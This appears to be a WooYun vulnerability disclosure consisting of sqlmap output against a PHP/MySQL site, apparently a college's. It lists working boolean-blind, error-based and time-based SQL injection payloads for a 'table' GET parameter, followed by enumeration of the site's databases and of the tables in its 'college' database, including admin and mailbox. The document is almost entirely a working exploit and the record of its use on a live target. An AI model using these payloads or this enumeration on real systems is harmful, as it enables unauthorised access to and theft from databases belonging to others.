WooYun.org

---
Parameter: table (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=12&table=intercourse WHERE 8430=8430 RLIKE (SELECT (CASE WHEN (8326=8326) THEN 0x696e746572636f75727365 ELSE 0x28 END))-- 
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=12&table=intercourse WHERE 2675=2675 AND (SELECT 5449 FROM(SELECT COUNT(*),CONCAT(0x71706a7671,(SELECT (ELT(5449=5449,1))),0x71716a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=12&table=intercourse WHERE 5223=5223 AND (SELECT * FROM (SELECT(SLEEP(5)))hRQj)-- 
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [3]:
[*] college
[*] information_schema
[*] mysql

---
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: college
[9 tables]
+-------------+
| admin       |
| affiche     |
| intercourse |
| mailbox     |
| news        |
| newspaper   |
| pic         |
| pic_news    |
| video_news  |
+-------------+